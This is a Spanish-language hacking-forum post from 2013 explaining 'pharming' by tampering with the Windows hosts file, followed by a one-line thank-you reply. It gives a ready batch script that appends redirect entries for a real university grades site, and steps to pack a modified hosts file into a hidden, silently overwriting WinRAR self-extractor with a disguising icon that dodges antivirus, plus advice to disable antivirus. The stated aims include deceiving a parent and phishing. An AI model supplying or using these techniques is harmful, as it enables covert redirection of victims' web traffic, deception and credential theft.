comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Pharming facil tres metodos diferentes

  • 1 Respuestas
  • 2391 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado dark.newb1e.zer0

  • *
  • Underc0der
  • Mensajes: 52
  • Actividad:
    0%
  • Reputación 0
  • Grey hat
    • Ver Perfil
    • Email
« en: Julio 28, 2013, 10:27:35 pm »

¿Que es el pharming?
.- es un metodo de explotar un bug o vulnerabilidad en el software de un servidor DNS (Sistema de Nombre de Dominio) o en un equipo propio, lo que te permite redirigir un nombre de dominio tipo (No tienes permisos para ver links. Registrate o Entra con tu cuenta) a otra maquina distinta, de esta forma si alguien entrara en el una pagina sera redirigido a otra.
ejem.
                yo quiero entrar a No tienes permisos para ver links. Registrate o Entra con tu cuenta  el cual esta reedireccionado mediante pharming a otra web por ejemplo No tienes permisos para ver links. Registrate o Entra con tu cuenta (trucos de algunos programas gratis).
este metodo es usado para posicionamiento web y phising con fines maleficos e interesantes

Metodo 1 autoinfeccion con bat

es simple abres un bloc de notas y modificas el host.

Código: DOS
  1. @No tienes permisos para ver links. Registrate o Entra con tu cuenta off
  2. No tienes permisos para ver links. Registrate o Entra con tu cuenta [ip de la web a la que quieras reedireccionar] [url de la pagina que estara infectada] %windir%\System32\drivers\etc\hosts
  3.  
bueno en mi caso infectare la pagina de registro de mi facultad para que mi padre no se entere de mis notas la web a la que no quiero que ingrese es web.fni.edu.bo y su ip es 192.181.13.76, reedireccionare a la pagina de mi universidad para evitar sospechas No tienes permisos para ver links. Registrate o Entra con tu cuenta y su ip 190.129.9.36, si no saben la ip de la pagina a reedireccionar basta con hacer un ping a la url.
obteniendo la ip de la pagina a reedireccionar
                                                                                   
(obteniendo la ip mediante ping en comando)


paso 1 crear el bat en un bloc de notas y guardarlo con la extension .bat
creando el archivo.bat
el codigo quedaria asi
Código: DOS
  1. @No tienes permisos para ver links. Registrate o Entra con tu cuenta off
  2. No tienes permisos para ver links. Registrate o Entra con tu cuenta 190.129.9.36 web.fni.edu.bo >>%windir%\System32\drivers\etc\hosts
  3. No tienes permisos para ver links. Registrate o Entra con tu cuenta 190.129.9.36 http://web.fni.edu.bo >>%windir%\System32\drivers\etc\hosts
  4. No tienes permisos para ver links. Registrate o Entra con tu cuenta 190.129.9.36 http://web.fni.edu.bo/fni/index.php >>%windir%\System32\drivers\etc\hosts
  5. No tienes permisos para ver links. Registrate o Entra con tu cuenta 190.129.9.36 fni.edu.bo >>%windir%\System32\drivers\etc\hosts
  6. No tienes permisos para ver links. Registrate o Entra con tu cuenta 190.129.9.36 web.fni.edu.bo/fni >>%windir%\System32\drivers\etc\hosts
  7.  
luego lo ejecutamos
ejecutamos el archivo.bat que creamos
y listo obtuvimos lo esperado ya sea ingresando la url manualmente o ingresando con el primer resultado de google nos reedirecciona a la web que queremos

nota activar el bat desactivando el antivirus, en caso de w7, w8 ejecutar con permisos de administrador.

Metodo 2 pharming con winrar
vamos a inicio -> ejecutar (o la tecla windows+r) escribimos drivers y presionamos enter
entramos en etc y copiamos el archivo hosts
lo copiamos a escritorio y lo editamos en un editor de texto añadiendole al final

[ip de la pagina a reedireccionar] [url de la web infectada]
luego guardan el archivo "hosts" editado, ahora lo interesante con winrar
damos click con el boton derecho del raton y elegimos la opcion de añadir al archivo....

en general marcamos la opcion "crear un archivo autoextraible" en algunos casos se llama "crear un archivo SFX"
luego vamos a la pestaña de avanzado y presionamos la opcion "autoextraible" o "opciones de SFX"
y en la carpeta de autoextraccion escribimos "%windir%\system32\drivers\etc"
luego en la misma ventana vamos a la pestaña "Modos" y seleccionamos la opcion de "ocultar todo" y "omitir ficheros persistentes", en caso de que exista esa opción
caso contrario en la pestaña "avanzado" ticar la opcion de "sobreescribir todos los ficheros" y "extraer y reemplazar ficheros"
bueno existe más que se puede hacer, existe la pestaña de texto e icono ahi pueden elegir un icono de su preferencia que tenga la extension .ico para camuflar el autoextraible pero en mi caso no tengo necesidad de ello asi que acepto y acepto las modificaciones que realice, bueno ahora nos queda ejecutar el archivo creado y listo tenemos el mismo resultado del anterior metodo un poco mas complicado que el bat pero los antivirus no detectaran el autoextraible hasta que se ejecute, ademas de que el archivo creado en winrar no abre una ventana como el bat.
Nota.- mismos puntos del anterior metodo.


Tercer metodo pharming con Cain y Abel
el tercer metodo ya esta posteado por ANTRAX al cual pueden acceder mediante este link No tienes permisos para ver links. Registrate o Entra con tu cuenta esta bien explicado


« Última modificación: Noviembre 07, 2014, 09:35:43 pm por Expermicid »
<title>Dulce caos, Dulce venganza</title>

Desconectado morodog

  • *
  • Underc0der
  • Mensajes: 350
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: MorodoG
  • Twitter: m4r4d4g
« Respuesta #1 en: Julio 29, 2013, 11:43:08 am »
Gracias por el aporte!

 

¿Te gustó el post? COMPARTILO!



Revelar password con " asteriscos " ( Metodo Facil )

Iniciado por Mr Newwer

Respuestas: 4
Vistas: 3882
Último mensaje Noviembre 18, 2011, 09:11:17 pm
por spawn_mty
EmailSpammer hacer spam nunca habia sido tan facil

Iniciado por user_en1gm4

Respuestas: 7
Vistas: 2120
Último mensaje Enero 31, 2018, 03:45:54 am
por user_en1gm4
¿Gasolina cara?. Cambia el precio del surtidor. Es fácil XD

Iniciado por d0r127

Respuestas: 0
Vistas: 2173
Último mensaje Octubre 30, 2016, 09:52:25 am
por d0r127
Peticiones (Request) HTTP, metodos de peticion y codigos de respuesta HTTP

Iniciado por ANTRAX

Respuestas: 0
Vistas: 3270
Último mensaje Febrero 18, 2010, 12:14:54 pm
por ANTRAX
Metodos alternativos para Accesar a un servidor [Hacking For Dummies]

Iniciado por MaztoR

Respuestas: 2
Vistas: 2660
Último mensaje Julio 07, 2012, 06:58:56 pm
por kid_goth